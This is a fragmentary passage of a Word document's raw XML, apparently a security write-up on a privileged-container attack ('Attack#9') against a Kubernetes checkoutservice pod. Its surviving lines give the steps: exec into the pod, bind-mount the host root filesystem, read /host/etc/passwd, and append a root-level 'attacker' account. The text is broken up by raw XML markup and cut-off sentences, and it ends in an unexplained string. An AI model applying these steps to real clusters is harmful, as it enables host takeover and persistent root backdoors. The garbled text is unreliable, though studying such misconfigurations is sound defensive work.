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Attack#9 privileged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Related configurations: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Attack#9.json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all insecure configs in Attack#9.json.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kubectl exec -it checkoutservice- -n default -- sh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attacker can mount the host filesystem into the container with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">privileged = true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#6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and root permission #1-5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Mkdir /host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Mount –bind / /host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attacker can view and modify sensitive directories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/host/etc/passwd, here we can see root shell is /bin/ash</w:t>
      </w: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new user: echo 'attacker:x:0:0:root:/root:/bin/ash' &gt;&gt; /host/etc/passwd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nwQg0DCtzJba1WQb9lh1OzIgY8Qdt5Pa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